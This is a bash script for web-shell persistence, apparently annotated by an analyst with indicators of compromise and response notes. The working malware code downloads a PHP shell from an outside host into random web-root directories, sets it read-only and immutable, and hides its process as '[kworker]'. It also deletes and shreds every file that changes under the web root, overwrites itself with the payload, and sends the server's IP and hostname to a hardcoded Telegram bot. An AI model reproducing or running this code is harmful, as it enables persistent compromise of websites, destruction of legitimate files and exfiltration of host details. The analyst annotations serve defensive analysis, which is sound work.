#!/bin/bash
#
# Analyst summary (from the code below):
#   Web-shell persistence watcher. It downloads a PHP file from BACKUP_SHELL
#   into directories under WEB_ROOT, marks it read-only (and immutable when
#   running as root), watches the web root with inotifywait, deletes any file
#   that triggers an event, re-downloads the PHP file somewhere else, and
#   reports each step to a Telegram chat. The long-running part is started
#   with argv[0] set to "[kworker]".
#
# Indicators visible in this file (usable for log and host searches):
#   - Outbound HTTPS to api.telegram.org/bot<token>/sendMessage, made by curl;
#     the token and message are on curl's command line.
#   - Outbound HTTPS to the BACKUP_SHELL host below.
#   - A process whose command line starts with "[kworker]" but whose
#     /proc/<pid>/exe resolves to bash. Genuine kernel worker threads have an
#     empty /proc/<pid>/cmdline, no exe link, and kthreadd (PID 2) as parent.
#   - inotifywait running recursively against the web root.
#   - Files named <8 alphanumeric chars>.php with mode 0400 under the web
#     root; when dropped as root they also carry the immutable attribute
#     (lsattr shows "i").
#
# Response notes that follow from the code:
#   - Delete/modify/move/attrib events under the watched tree trigger another
#     download, so the watcher process has to be stopped before cleanup.
#   - Immutable files need `chattr -i` before they can be removed.
#   - The monitor loop deletes whichever file raised the event, so legitimate
#     site files changed while it ran may be missing; compare against backups.

# Configuration - ADJUST TO YOUR SERVER
WEB_ROOT="/home/sekolahb/public_html/" # Main web directory (can be changed)
WEB_SHELL_DIR="$WEB_ROOT/" # Web-shell directory (follows WEB_ROOT, so the whole web root is the watched tree)
BACKUP_SHELL="https://raw.zeverix.com/raw/untitled-719" # Location the PHP payload is fetched from
TELEGRAM_BOT_TOKEN="7765041082:AAGhlbXBsa4qDiAKbVOSmtZ50Gw45-TcVK8" # Telegram Bot token (hardcoded; operator-side identifier)
TELEGRAM_CHAT_ID="1345261884" # Telegram chat ID that receives the reports

#######################################
# Send a text message to the configured Telegram chat.
# Globals:   TELEGRAM_BOT_TOKEN, TELEGRAM_CHAT_ID (read)
# Arguments: $1 - message text
# Outputs:   none; curl's stdout and stderr are discarded
# Notes:     curl is capped at 3 seconds by `timeout`. The bot token is part
#            of the URL argument, so it appears in the process list and in
#            any command-line auditing (auditd execve, EDR) while curl runs.
#######################################
send_telegram() {
  local message="$1"
  timeout 3 curl -s -X POST "https://api.telegram.org/bot$TELEGRAM_BOT_TOKEN/sendMessage" \
    -d "chat_id=$TELEGRAM_CHAT_ID" \
    -d "text=$message" > /dev/null 2>&1
}

#######################################
# Send the startup report.
# Globals:   WEB_ROOT, WEB_SHELL_DIR (read)
# Outputs:   one Telegram message
# Notes:     The message discloses the first address from `hostname -I`, the
#            hostname, and fields 3 and 4 of `ls -ld "$WEB_ROOT"` (owner and
#            group) to the remote chat.
#######################################
send_startup_notification() {
  local server_ip=$(hostname -I | awk '{print $1}')
  local server_name=$(hostname)
  local web_root_info=$(ls -ld "$WEB_ROOT" | awk '{print $3,$4}')
  send_telegram "🟢 ANTI GEDOR BOT AKTIF! Server: $server_name ($server_ip) Web Root: $WEB_ROOT Shell Dir: $WEB_SHELL_DIR Owner: $web_root_info Status: Monitoring aktif ✅ Sistem siap menghadapi serangan! Siapa berani hapus, langsung hilang duluan!🖕"
}

#######################################
# Download the PHP payload again into a randomly chosen existing directory.
# Globals:   WEB_ROOT, BACKUP_SHELL (read)
# Outputs:   path of the new file on stdout; one Telegram message
# Notes:     The file name is 8 characters from [a-zA-Z0-9] read from
#            /dev/urandom plus ".php". The file is set to mode 0400 and, when
#            the effective UID is 0, given the immutable attribute.
#######################################
deploy_shell() {
  # List directories at depth <= 1 under WEB_ROOT, skipping the listed names,
  # in shuffled order (the basename test presumably excludes WEB_ROOT itself)
  local existing_dirs=($(find "$WEB_ROOT" -maxdepth 1 -type d ! -name "$(basename "$WEB_ROOT")" ! -name "cgi-bin" ! -name "error" ! -name "icons" ! -name "shell" 2>/dev/null | shuf))

  # Take the first entry of the shuffled list
  local random_dir="${existing_dirs[0]}"

  # If no directory matched, fall back to WEB_ROOT
  if [ -z "$random_dir" ]; then
    random_dir="$WEB_ROOT"
  fi

  # Generate a random file name
  local shell_name=$(tr -dc 'a-zA-Z0-9' < /dev/urandom | fold -w 8 | head -n 1).php
  local new_shell_path="$random_dir/$shell_name"

  # Download the payload from the URL
  curl -s -o "$new_shell_path" "$BACKUP_SHELL"
  chmod 400 "$new_shell_path"
  # Immutable attribute is only attempted as root; errors are discarded
  if [ "$(id -u)" -eq 0 ]; then
    chattr +i "$new_shell_path" 2>/dev/null
  fi

  send_telegram "⚠️ SHELL DEPLOYED: $new_shell_path"
  echo "$new_shell_path"
}

#######################################
# Delete a file, falling back to shred if it still exists afterwards.
# Arguments: $1 - path to delete
# Notes:     Called from the monitor loop with whichever path raised an
#            inotify event, so it is not limited to attacker-dropped files.
#            `shred -fuz` overwrites before unlinking, which limits what
#            file carving can recover.
#######################################
delete_intruder() {
  local target="$1"
  rm -f "$target"
  if [ -f "$target" ]; then
    shred -fuz "$target" 2>/dev/null
  fi
}

#######################################
# Look for a PHP process that matches the heuristics below and delete the
# file its /proc/<pid>/exe link resolves to.
# Globals:   WEB_SHELL_DIR (read)
# Outputs:   the deleted path on stdout, when one was selected and is a
#            regular file; one Telegram message in that case
# Notes:     Only the first 10 PIDs from `pgrep -f "php"` are examined. A
#            process is selected when its command line contains "unlink",
#            "delete" or "rm ", or when its exe path contains WEB_SHELL_DIR.
#            The path handed to delete_intruder is the resolved executable,
#            so for impact assessment check whether a PHP binary is missing.
#######################################
detect_and_delete_php_attacker() {
  local php_processes=$(pgrep -f "php" | head -10)
  local attacker_found=""

  for pid in $php_processes; do
    local php_file=$(readlink -f /proc/$pid/exe 2>/dev/null)
    local cmd=$(cat /proc/$pid/cmdline 2>/dev/null | tr '\0' ' ')

    if [[ "$cmd" == *"unlink"* ]] || [[ "$cmd" == *"delete"* ]] || [[ "$cmd" == *"rm "* ]]; then
      attacker_found="$php_file"
      break
    fi

    if [[ "$php_file" == *"$WEB_SHELL_DIR"* ]]; then
      attacker_found="$php_file"
      break
    fi
  done

  if [ -n "$attacker_found" ] && [ -f "$attacker_found" ]; then
    delete_intruder "$attacker_found"
    send_telegram "🔥 PHP ATTACKER DELETED! File: $attacker_found"
    echo "$attacker_found"
  fi
}

#######################################
# Overwrite this script's own file with the downloaded PHP payload.
# Globals:   BACKUP_SHELL (read)
# Arguments: $1 - stored in shell_path; not referenced again in this function
# Outputs:   one Telegram message
# Notes:     The download target is "$0", so after this runs the launcher's
#            path on disk holds the payload rather than this script. The
#            file is set to mode 0400 and made immutable when running as root.
#######################################
transform_to_shell() {
  local script_path="$0"
  local shell_path="$1"

  # Download the payload over the script's own path
  curl -s -o "$script_path" "$BACKUP_SHELL"

  # Set permissions
  chmod 400 "$script_path"

  # When root, add the immutable attribute
  if [ "$(id -u)" -eq 0 ]; then
    chattr +i "$script_path" 2>/dev/null
  fi

  send_telegram "🔄 SCRIPT TRANSFORMED TO SHELL! Location: $script_path Status: Ready for action"
}

# Export all settings to the child shell
export WEB_ROOT WEB_SHELL_DIR BACKUP_SHELL TELEGRAM_BOT_TOKEN TELEGRAM_CHAT_ID

# Check whether the script was invoked to overwrite itself with the payload
if [[ "$1" == "--transform" ]]; then
  transform_to_shell "$2"
  exit 0
fi

# Main loop with process-name disguise.
#
# NOTE(review): everything from the `exec -a` line to the end is passed to a
# background bash as its -c argument and contains single quotes nested inside
# that single-quoted argument, so it is kept exactly as found, including its
# untranslated comments. Apparent intent, step by step:
#   1. Start bash in the background with argv[0] "[kworker]".
#   2. Re-declare send_telegram, deploy_shell, delete_intruder and
#      detect_and_delete_php_attacker through a here-document.
#   3. mkdir -p the watched directory and call send_startup_notification.
#   4. Pick a random directory and an 8-character .php name, then run
#      "$0 --transform <path>" under nohup after a 2-second sleep.
#   5. Run inotifywait -m -r on WEB_SHELL_DIR for modify, move, delete and
#      attrib events; for every event on a non-directory path: delete that
#      path, run the PHP-process check, download the payload again, and send
#      a Telegram alert containing the path, the event and the new location.
exec -a "[kworker]" bash -c '
# Definisikan ulang fungsi di dalam subshell
source /dev/stdin <<'EOF'
# Fungsi kirim notifikasi ke Telegram
send_telegram() {
  local message="$1"
  timeout 3 curl -s -X POST "https://api.telegram.org/bot$TELEGRAM_BOT_TOKEN/sendMessage" \
    -d "chat_id=$TELEGRAM_CHAT_ID" \
    -d "text=$message" > /dev/null 2>&1
}

# Fungsi deploy ulang shell
deploy_shell() {
  local existing_dirs=($(find "$WEB_ROOT" -maxdepth 1 -type d ! -name "$(basename "$WEB_ROOT")" ! -name "cgi-bin" ! -name "error" ! -name "icons" ! -name "shell" 2>/dev/null | shuf))
  local random_dir="${existing_dirs[0]}"

  if [ -z "$random_dir" ]; then
    random_dir="$WEB_ROOT"
  fi

  local shell_name=$(tr -dc 'a-zA-Z0-9' < /dev/urandom | fold -w 8 | head -n 1).php
  local new_shell_path="$random_dir/$shell_name"

  curl -s -o "$new_shell_path" "$BACKUP_SHELL"
  chmod 400 "$new_shell_path"
  if [ "$(id -u)" -eq 0 ]; then
    chattr +i "$new_shell_path" 2>/dev/null
  fi

  send_telegram "⚠️ SHELL DEPLOYED: $new_shell_path"
  echo "$new_shell_path"
}

# Fungsi hapus file berbahaya
delete_intruder() {
  local target="$1"
  rm -f "$target"
  if [ -f "$target" ]; then
    shred -fuz "$target" 2>/dev/null
  fi
}

# Fungsi deteksi PHP attacker
detect_and_delete_php_attacker() {
  local php_processes=$(pgrep -f "php" | head -10)
  local attacker_found=""

  for pid in $php_processes; do
    local php_file=$(readlink -f /proc/$pid/exe 2>/dev/null)
    local cmd=$(cat /proc/$pid/cmdline 2>/dev/null | tr '\0' ' ')

    if [[ "$cmd" == *"unlink"* ]] || [[ "$cmd" == *"delete"* ]] || [[ "$cmd" == *"rm "* ]]; then
      attacker_found="$php_file"
      break
    fi

    if [[ "$php_file" == *"$WEB_SHELL_DIR"* ]]; then
      attacker_found="$php_file"
      break
    fi
  done

  if [ -n "$attacker_found" ] && [ -f "$attacker_found" ]; then
    delete_intruder "$attacker_found"
    send_telegram "🔥 PHP ATTACKER DELETED! File: $attacker_found"
    echo "$attacker_found"
  fi
}
EOF

# Buat direktori target jika belum ada
mkdir -p "$WEB_SHELL_DIR"

# Kirim notifikasi startup
send_startup_notification

# Transform script menjadi shell di lokasi acak
random_dir=$(find "$WEB_ROOT" -maxdepth 1 -type d ! -name "$(basename "$WEB_ROOT")" ! -name "cgi-bin" ! -name "error" ! -name "icons" ! -name "shell" 2>/dev/null | shuf | head -1)
if [ -z "$random_dir" ]; then
  random_dir="$WEB_ROOT"
fi
shell_name=$(tr -dc 'a-zA-Z0-9' < /dev/urandom | fold -w 8 | head -n 1).php
transform_path="$random_dir/$shell_name"

# Jalankan transformasi di background
nohup bash -c "sleep 2; $0 --transform '$transform_path'" > /dev/null 2>&1 &

# Monitor direktori
inotifywait -m -r -e modify,move,delete,attrib "$WEB_SHELL_DIR" --format "%w%f %e" 2>/dev/null | while read file event
do
  [[ -d "$file" ]] && continue

  # Hapus file yang diotak-atik
  delete_intruder "$file"

  # Deteksi dan hapus balik PHP attacker
  attacker_file=$(detect_and_delete_php_attacker)

  # Deploy shell baru
  new_shell=$(deploy_shell)

  # Kirim notifikasi lengkap
  if [ -n "$attacker_file" ]; then
    send_telegram "🚨 PHP ATTACKER DETECTED & DELETED! File: $file Event: $event Attacker: $attacker_file New Shell: $new_shell ✅Mendeteksi file PHP yang dipakai untuk menghapus. ✅Menghapus balik file PHP tersebut secara otomatis. ✅Mengirim notifikasi ke bot Telegram Anda dengan detail ancamannya. Prinsipnya simpel: Siapa berani hapus, langsung hilang duluan!🖕"
  else
    send_telegram "🚨 ALERT! File: $file | Event: $event | New Shell: $new_shell"
  fi
done
' &